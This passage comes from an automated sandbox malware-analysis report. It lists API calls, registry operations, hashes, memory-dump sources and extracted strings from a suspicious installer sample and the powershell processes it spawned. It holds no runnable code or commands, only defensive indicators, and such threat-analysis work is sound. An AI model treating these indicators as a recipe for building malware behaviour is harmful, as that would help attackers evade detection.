                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                      • String ID:
                                                      • API String ID: 2667972263-0
                                                      • Opcode ID: 99a72b25e835b2ea7940c93163da3ca2f710589d23dcac0e6d207047e8163098
                                                      • Instruction ID: 0665ed67c6e74a6a0a4f3ff5189880cf350c83190f31c90c7548f1ee6fedf688
                                                      • Opcode Fuzzy Hash: 99a72b25e835b2ea7940c93163da3ca2f710589d23dcac0e6d207047e8163098
                                                      • Instruction Fuzzy Hash: 5731CF71D00124BBCF21AFA5CD89D9E7EB9AF48364F10023AF511762E1CB794C429B98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F4F
                                                      • wsprintfW.USER32 ref: 00404F58
                                                      • SetDlgItemTextW.USER32(?,00422F48), ref: 00404F6B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: ItemTextlstrlenwsprintf
                                                      • String ID: %u.%u%s%s$H/B
                                                      • API String ID: 3540041739-2222257793
                                                      • Opcode ID: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
                                                      • Instruction ID: 614c6b03a1206c52a907a8f7c7d2435543e043070c0789599254521b237785a9
                                                      • Opcode Fuzzy Hash: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
                                                      • Instruction Fuzzy Hash: D911D5336041287BDB00666D9C45E9E329CEB85374F254637FA25F31D1EA79C82282E8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: CloseEnum$DeleteValue
                                                      • String ID:
                                                      • API String ID: 1354259210-0
                                                      • Opcode ID: b11fc5b6ae31e3f7bcdb9db3b4e616a20ad73eae00ded2b204568f86272eb2db
                                                      • Instruction ID: 09cb529ade84319239dc5b50ebc61ba38ec7146c59f77be9acf979a475766563
                                                      • Opcode Fuzzy Hash: b11fc5b6ae31e3f7bcdb9db3b4e616a20ad73eae00ded2b204568f86272eb2db
                                                      • Instruction Fuzzy Hash: FD218B7150011ABFDF119F90CE89EEF7B7DEB10388F100076B949B11E0D7B48E54AA68
                                                      Uniqueness
                                                      • Uniqueness Score: -1.00%
                                                      APIs
                                                      • GetDlgItem.USER32(?,?), ref: 00401D9F
                                                      • GetClientRect.USER32(?,?), ref: 00401DEA
                                                      • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                                      • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                                      • DeleteObject.GDI32(00000000), ref: 00401E3E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                      • String ID:
                                                      • API String ID: 1849352358-0
                                                      • Opcode ID: 5409701174cc037821a308746f1ef467676f72fb6d339cbf159e8a6e8e9d4097
                                                      • Instruction ID: 305ae2269dae07fc62aa10ca295236b4d3f8ba7b944ef9ab65218e6e9e6ea469
                                                      • Opcode Fuzzy Hash: 5409701174cc037821a308746f1ef467676f72fb6d339cbf159e8a6e8e9d4097
                                                      • Instruction Fuzzy Hash: FE210772A04119AFCB15DF98DE45AEEBBB5EF08304F14003AF945F62A0D7789D81DB98
                                                      Uniqueness
                                                      • Uniqueness Score: -1.00%
                                                      APIs
                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Timeout
                                                      • String ID: !
                                                      • API String ID: 1777923405-2657877971
                                                      • Opcode ID: 483d17516720e2e8ab10c88a8952f1e8a1428c38e87ce861c3d636333663c13f
                                                      • Instruction ID: 6f1bda49a4997cd21eb3df4025a59d3ac8dc5d95b16fa6faa4f7de2005ea5abe
                                                      • Opcode Fuzzy Hash: 483d17516720e2e8ab10c88a8952f1e8a1428c38e87ce861c3d636333663c13f
                                                      • Instruction Fuzzy Hash: 57219C7191421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941CB98
                                                      Uniqueness
                                                      • Uniqueness Score: -1.00%
                                                      APIs
                                                      • lstrlenW.KERNEL32(distributed\Ristingets\,00000023,00000011,00000002), ref: 004024DA
                                                      • RegSetValueExW.ADVAPI32(?,?,?,?,distributed\Ristingets\,00000000,00000011,00000002), ref: 0040251A
                                                      • RegCloseKey.ADVAPI32(?,?,?,distributed\Ristingets\,00000000,00000011,00000002), ref: 00402602
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: CloseValuelstrlen
                                                      • String ID: distributed\Ristingets\
                                                      • API String ID: 2655323295-4223474621
                                                      • Opcode ID: 30c8621953cd876262fbd94b52e9500918e6bc3baaa165e74801803e0a09f0dc
                                                      • Instruction ID: be9c33e72f15a848a09509bfe82e7b73cbf05d8b6c9bfbfc98f7540490fedb8c
                                                      • Opcode Fuzzy Hash: 30c8621953cd876262fbd94b52e9500918e6bc3baaa165e74801803e0a09f0dc
                                                      • Instruction Fuzzy Hash: 26119D31900118AEEB10EFA5DE59EAEBAB4AB44318F10483FF404B61C0C7B88E019A58
                                                      Uniqueness
                                                      • Uniqueness Score: -1.00%
                                                      APIs
                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403632,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405F57
                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403632,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405F61
                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405F73
                                                      Strings
                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F51
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: CharPrevlstrcatlstrlen
                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                      • API String ID: 2659869361-3081826266
                                                      • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                      • Instruction ID: a99b79add3f29df6de165ac7772d062030ca4d7d7db28986cd5f5f8a2b4e36b3
                                                      • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                      • Instruction Fuzzy Hash: C9D0A731101934AAC211AF548D04CDF639C9F463443414C3BF501B30A1CB7D6D6287FD
                                                      Uniqueness
                                                      • Uniqueness Score: -1.00%
                                                      APIs
                                                      • lstrlenA.KERNEL32(afsmitningernes), ref: 0040269A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: lstrlen
                                                      • String ID: afsmitningernes$distributed\Ristingets\
                                                      • API String ID: 1659193697-3641217871
                                                      • Opcode ID: 0bc0856152eb1df416620cc5b8216ee98a437742c409cafcdd725fde6fb42ba2
                                                      • Instruction ID: 3f04c1712215209208acb7642429b7129ba4cba87377fac841ce35f74c6015ca
                                                      • Opcode Fuzzy Hash: 0bc0856152eb1df416620cc5b8216ee98a437742c409cafcdd725fde6fb42ba2
                                                      • Instruction Fuzzy Hash: DF110A72A40205BBCB00BBB19E4AA9F76A19F50748F21483FF502F61C1DAFD89D1665E
                                                      Uniqueness
                                                      • Uniqueness Score: -1.00%
                                                      APIs
                                                      • IsWindowVisible.USER32(?), ref: 004056AA
                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 004056FB
                                                        • Part of subcall function 0040464D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040465F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: Window$CallMessageProcSendVisible
                                                      • String ID:
                                                      • API String ID: 3748168415-3916222277
                                                      • Opcode ID: 566dc257d6ecfccfd9b8870a3abbf6eef49955a94d49fdbfe0e36d929d226f84
                                                      • Instruction ID: 56d6425d582badedfe6e85af8287ead15e3733fa9de593adb61ce7d3cc062d63
                                                      • Opcode Fuzzy Hash: 566dc257d6ecfccfd9b8870a3abbf6eef49955a94d49fdbfe0e36d929d226f84
                                                      • Instruction Fuzzy Hash: 1601B131101608ABDF205F41DE80AAF3A39EB84754F90483BF509761D0D77B8C929E6D
                                                      Uniqueness
                                                      • Uniqueness Score: -1.00%
                                                      APIs
                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,: Completed,?,00000000,004067C1,80000002), ref: 00406596
                                                      • RegCloseKey.ADVAPI32(?), ref: 004065A1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: CloseQueryValue
                                                      • String ID: : Completed
                                                      • API String ID: 3356406503-2954849223
                                                      • Opcode ID: 45cc12acc3a9c215c07d598151d8e3fd579320fa7e8caec45c805d12e0fab9e6
                                                      • Instruction ID: 225dfe442f4fc2e839130f584d2f70a73ee2f61c7405cac2e0d59c7fe544a8ff
                                                      • Opcode Fuzzy Hash: 45cc12acc3a9c215c07d598151d8e3fd579320fa7e8caec45c805d12e0fab9e6
                                                      • Instruction Fuzzy Hash: 39017172510209FEDF218F55DD05EDB3BE8EB54364F014035FD1592190E738D968DBA4
                                                      Uniqueness
                                                      • Uniqueness Score: -1.00%
                                                      APIs
                                                      • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00403141,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405FA3
                                                      • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00403141,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405FB3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: CharPrevlstrlen
                                                      • String ID: C:\Users\user\Desktop
                                                      • API String ID: 2709904686-224404859
                                                      • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                      • Instruction ID: 76a3089014cba6cdede5e63107dce03d3cc6699033e3804c636830b34c248568
                                                      • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                      • Instruction Fuzzy Hash: D1D05EB2401921DAE3126B04DD00D9F63ACEF12300746482AE840E7161D77C5C8186AD
                                                      Uniqueness
                                                      • Uniqueness Score: -1.00%
                                                      APIs
                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E7
                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 004060FF
                                                      • CharNextA.USER32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406110
                                                      • lstrlenA.KERNEL32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406119
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                      • String ID:
                                                      • API String ID: 190613189-0
                                                      • Opcode ID: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                      • Instruction ID: 41d5ee4ea83cc4d308be6584820b02a87ee89e19241337121ce36a8d52a16fb8
                                                      • Opcode Fuzzy Hash: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                      • Instruction Fuzzy Hash: 9DF06235504418EFC702DBA9DD00D9EBFA8EF46350B2640B9E841FB211DA74DE11AB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$4'kq$4'kq$4'kq$4'kq$4'kq$4rl$4rl$tLgk$tLgk$tLgk$tLgk$x.fk$x.fk$x.fk$-fk$-fk
                                                      • API String ID: 0-4025161208
                                                      • Opcode ID: 0f1f935e7eee01064f771c546811b6bf7d9a41b1a81e9c59c89bd1d1f7e8adaa
                                                      • Instruction ID: 80d8e6a07ff3b48fa5bad33a4424e6c233a26802065eee63184494a06600e78c
                                                      • Opcode Fuzzy Hash: 0f1f935e7eee01064f771c546811b6bf7d9a41b1a81e9c59c89bd1d1f7e8adaa
                                                      • Instruction Fuzzy Hash: CCF24FB4A00219DFDB64DB54CD90BDAB7B2FF89304F1085AAD909AB751CB31AE81CF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2194295382.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_4910000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e7401fa50f4b8b56ccd6f37c64d134ccb140b482a7e8b81c00698228589a28b7
                                                      • Instruction ID: 84b43cfa70bd43d272966bb19d89610954d9d3bf83189a39a038d1fb87821827
                                                      • Opcode Fuzzy Hash: e7401fa50f4b8b56ccd6f37c64d134ccb140b482a7e8b81c00698228589a28b7
                                                      • Instruction Fuzzy Hash: 9AB16B70E0020DDFDF14CFA9D98579DBBF6AF88354F148539D815AB268EB34A842CB81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2194295382.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_4910000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2a202e83089867f1adbbde887f5e44ee86673639fcb0ddcf9e4bacfd604d6b72
                                                      • Instruction ID: 30964472c4c286a6e736bb6c258c1f685f322dec4504f462e8701cd77effe52e
                                                      • Opcode Fuzzy Hash: 2a202e83089867f1adbbde887f5e44ee86673639fcb0ddcf9e4bacfd604d6b72
                                                      • Instruction Fuzzy Hash: 69B14B70E0020DDFDB10CFA9D98579DBBF6BF88354F148539D815A7268EB34A946CB81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2194295382.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_4910000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a1941962cb42a4c366a937623c873c50e4714c3e585572e68e204d8cb6da082e
                                                      • Instruction ID: ad728422b818cfe95d57e4478287a35b9aa0f34a9063b3eb28021e59f723f42d
                                                      • Opcode Fuzzy Hash: a1941962cb42a4c366a937623c873c50e4714c3e585572e68e204d8cb6da082e
                                                      • Instruction Fuzzy Hash: 45B17E70E0020DDFDB10CFA9C99579DBBF6AF88314F148539D819EB268EB74A845CB81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$4'kq$4'kq$4'kq$tLgk$tLgk$x.fk$x.fk$-fk$-fk
                                                      • API String ID: 0-1113529463
                                                      • Opcode ID: 382907f785646447f8964c583b152661d857b7778a79d72825445aa281f882b5
                                                      • Instruction ID: d6ab15c396b4488a7f829f5bd896cb2d5df20232962076e1d75df7338e93a99e
                                                      • Opcode Fuzzy Hash: 382907f785646447f8964c583b152661d857b7778a79d72825445aa281f882b5
                                                      • Instruction Fuzzy Hash: 23B250B4A013149FCB64DB64CD95BDAB7B2FF89304F1085AAD8096B751CB31AE81CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$4'kq$tLgk$x.fk$-fk
                                                      • API String ID: 0-113696938
                                                      • Opcode ID: 377c0a12a27c522125df55ebfa427f95bcc9296b09fe067ad903c31571012538
                                                      • Instruction ID: a39aa2bc8c5a8d17d74fdb82706aef4be04e9c9c812cf4ab3d9ba0fd18532e9d
                                                      • Opcode Fuzzy Hash: 377c0a12a27c522125df55ebfa427f95bcc9296b09fe067ad903c31571012538
                                                      • Instruction Fuzzy Hash: 747280B0A00214DFDB24DF68C950FAAB7B2EF85304F5085AAD959AF741CB31AD85CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$4'kq$4'kq$x.fk$-fk
                                                      • API String ID: 0-2445202783
                                                      • Opcode ID: 4da12a8872e8b4feae84621dc1b7fb1aa6b7d0cc3773f5a7de64c793fd83901a
                                                      • Instruction ID: dde3cde72652b55eb62869ba5ce2e26470497e3d4f1ba064a5902f7af1cc62ac
                                                      • Opcode Fuzzy Hash: 4da12a8872e8b4feae84621dc1b7fb1aa6b7d0cc3773f5a7de64c793fd83901a
                                                      • Instruction Fuzzy Hash: 5652B2B0A00214DFDB24DF68C950BAAB7B2EF85304F5085AAD9096F751CB32ED85CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$4'kq$4rl$tLgk$tLgk$x.fk
                                                      • API String ID: 0-2523537002
                                                      • Opcode ID: 900b796625e2436d455ae5b21a705561b539b9a5cb379d373f4441e4e20c65c9
                                                      • Instruction ID: 7e237036124ece69f0dcb4377e72223c695493b880f6bb9b7c977b1d71e2b7b5
                                                      • Opcode Fuzzy Hash: 900b796625e2436d455ae5b21a705561b539b9a5cb379d373f4441e4e20c65c9
                                                      • Instruction Fuzzy Hash: FC424CB4A00315DFDB64DB24C994BEAB7B2FF45304F1084AAD909AB751CB71AE82CF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$4'kq$x.fk$-fk
                                                      • API String ID: 0-3528880643
                                                      • Opcode ID: 433d1bd4aec197b0aa00e8b7a37ca58ac2e57591d7fd4f2821b590b4bbc27943
                                                      • Instruction ID: b4e507af987af2afefc8e853bc72a2c06da533c396e7f04a7aef7719889b812c
                                                      • Opcode Fuzzy Hash: 433d1bd4aec197b0aa00e8b7a37ca58ac2e57591d7fd4f2821b590b4bbc27943
                                                      • Instruction Fuzzy Hash: 95329FB0A00214DFDB24DF68C950FAAB7B2FF85304F5085AAD9596B741CB32AD85CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$4'kq$x.fk$-fk
                                                      • API String ID: 0-3528880643
                                                      • Opcode ID: 71c3fe9141553402c76157c8ab397ffc792dd34e507665735e826d1ca0f05a62
                                                      • Instruction ID: 0176ae24cd0888e01bba5e4abda0aace88ac903fb62090ec2efd308f9272f411
                                                      • Opcode Fuzzy Hash: 71c3fe9141553402c76157c8ab397ffc792dd34e507665735e826d1ca0f05a62
                                                      • Instruction Fuzzy Hash: 12325EB4A013199FCB24DB54CD90B9AB7B2BB89304F1085AAD9496F751CB31AE81CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ful$(ful$(ful$(ful$(ful$4'kq$4rl$tLgk$x.fk
                                                      • API String ID: 0-1145424364
                                                      • Opcode ID: 22a90f3d63c1b9f08c0f9210f09f08ef106b79d6d61c41d81db26a95a6e33838
